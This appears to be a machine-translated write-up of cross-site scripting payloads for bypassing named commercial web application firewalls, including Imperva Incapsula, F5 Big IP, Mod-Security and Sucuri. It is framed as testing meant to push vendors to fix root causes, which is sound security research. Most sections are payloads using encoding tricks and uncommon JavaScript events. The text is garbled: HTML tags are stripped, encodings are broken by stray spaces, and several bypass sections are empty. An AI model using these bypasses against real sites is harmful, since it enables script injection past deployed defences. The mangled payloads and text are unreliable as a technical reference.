Waf xss bypass posture

Waf xss bypass posture

Due to the wide use of application firewalls, it is necessary to test WAF's ability to defend against xss attacks. Of course, all the experiments are to prove that the vendor must eliminate the vulnerability from the root cause, and cannot lie on the WAF without any worries.

Some popular WAF such as F5 Big IP, Imperva Incapsula, AQTRONIX WebKnight, PHP-IDS, Mod-Security, Sucuri, QuickDefense, and Barracuda WAF are all tested. bypass.

0 × 01 Introduction

WAF is an application, server plug-in, or filter that uses a series of rules to filter http sessions. These rules are usually used to defend against common threats, XSS, SQL injection, and some web-related vulnerabilities. This test only focuses on the WAF protection Bypass Method.

0 × 02 test environment

Google Chrome

Opera Browser

Mozilla Firefox

Internet Explorer

0 × 03 test results

1. Imperva Incapsula

During the test, we found that Imperva Incapsula filters many common xss loads, such as being filtered. At the same time, no detection is found. the only obstacle to bypassing filtering is to find the action on error. Alert (), prompt (), confirm (), and eval () are all prohibited. You can only find other alternative methods to prove the existence of the xss vulnerability.

1.1 first bypass

Double URL encoding + html encoding + Unicode encoding (all browsers pass)
Double-url encoding exists on the server specified by the client for URL Decoding multiple times.
% 3 Cimg % 2 Fsrc % 3D % 22x % 22% 2 Fonerror % 3D % 22 prom % 5Cu0070t % 2526% 2523 x 28% 3B % 2526% 25
23 x 27% 3B % 2526% x 2523 3B % 58% x 2526% 3B % 2523 53% x 2526% 3B % 25
26% 2523 x 29% 3B % 22% 3E

1.2 second bypass: JS-F ** K load (full browser) second bypass Based on JS-F ** K-a seven character JS creation technology, the load structure is roughly the same as above,
Img/src = "x"/onerror = "[JS-F ** K Payload]">

The action is okay. The only drawback is the length. Most servers have strict requirements on the GET request URL, so it is better to use it for POST requests. In addition, this load looks perfect.

2. WebKnight

The WebKnight test is very different. Its filtering rules are frequently updated by the security community. The experiment shows that the two bypass methods only affect WebKnight v4.1 and the v4.2 version is fixed.

2.1 first bypass ontoggle JS Event (Google Chrome)

This time only works in Chrome.

The toggle () method switches the visible state of the element.

If the selected elements are visible, these elements are hidden. If the selected elements are hidden, these elements are displayed. Only supported in chrome.
Ontoggle = alert (1)>

2.2 Second bypass Onshow JS event (Mozilla Firefox)

The onshow JS event is applied. You can click the trigger script to bypass WebKnight xss filtering.
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "alert (1)">

3. F5 Big IP

F5 Big IP is recognized as an enterprise-level application firewall. The idea of xss bypass is not limited to action.

3.1 first bypass: Onwheel JS event + specify the height of the page size on the style attribute (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "[DATA]">

3.2 second bypass: Onshow JS event (Mozilla Firefox)

Click the user to trigger the script.
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "[DATA]">

3.3 third bypass: JS-F ** K load (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "[JS-F ** k Payload]">
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "[JS-F ** k
Payload] ">

3.4 fourth bypass: HTML encoding + Double URL encoding (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "prom % 25% 32% 33% 25% 36x70; t (1)">
Contextmenu = "xss"> Right-Click Here id = "xss"
Onshow = "prom % 25% 32% 33% 25% 36x70; t (1)">

4. Barracuda WAF

The result is the same as that of F5 Big IP.

4.1
Style = "height: 1000px" onwheel = "alert (1)">

4.2
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "alert (1)">

5. PHP-IDS

By reviewing and filtering rules, we found that JS events are not in the blacklist. In addition, the main protection measures of PHP-IDS is based on JS event action. For example, alert () will be immediately discovered by the PHP-IDS, and all currently known encoding technologies are filtered out, with specific protective measures to defend against load structures. Therefore, we have to bypass the protection mechanism by exploiting browser behavior.

5.1 first bypass: The application browser responds to user input Behaviors

Can bypass PHP-IDS v0.7

5.2 second bypass: double URL Encoding

6. Mod-Security

Experiments show that Mod-Security is particularly sensitive to malicious requests. For example, hello % 20 onsomething = dosomething is because onsomething looks like a JS event and is marked as a potential xss Script attack. Therefore, pay attention to the vulnerabilities that can be used internally to bypass filtering.

6.1 first bypass using () and () (Google Chrome & Opera Browser & Internet Explorer)

This load contains a link pointing to a javascript load. This method is usually detected, but we use a large number of new lines and tabs to bypass it.
Href = "j [785 bytes of ()] avasert: alert (1);"> XSS

6.2 second bypass of US Code (only IE6 and IE7)


6.3 The third time the Triple URL encoding is bypassed
/% 25% 32% 35% 25% 33% 36% 25% 36% 36% 25% 32% 35% 25% 33% 36% 25% 36% 35 mouseover = alert (1)>

7. Quick Defense

Currently, Quick Defense filtering rules are insufficient to support web applications at the product level. Although there are many JS events in the blacklist, some coding technologies can be used to bypass them.

7.1 first bypass: OnSearch JS event + Unicode encoding (Google Chrome)
Type = "search" onsearch = "aler \ u0074 (1)">

7.2 second bypass: OnToggle JS event + Unicode encoding (Google Chrome)
Ontoggle = "aler \ u0074 (1)">

8. Sucuri WAF

Sucuri WAF is equally sensitive to malicious requests. In April this year, many researchers completely bypassed Sucuri WAF, so all the findings were repaired. xss can only be implemented through earlier browsers.

Bypass Method: US encoding (IE6 and IE7)



0 × 04 Summary

It is entirely possible to construct an attack vector to bypass the filter based on the vulnerabilities of each WAF. For vendors, WAF allows attackers to spend more time, however, it is still essential to fundamentally investigate and fix vulnerabilities.